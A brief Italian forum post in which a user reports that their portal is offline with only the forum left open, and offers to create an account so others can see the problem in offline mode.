Attualmente il portale è offiline, ho lasciato aperto solo il forum, quindi, se qualcuno di voi volesse provare ad accedere per vedere di cosa si tratta, posso creare un account per accedere alla modalità offile dove si può riscontrare il problema.

meth.master

@meth.master

Post creati da meth.master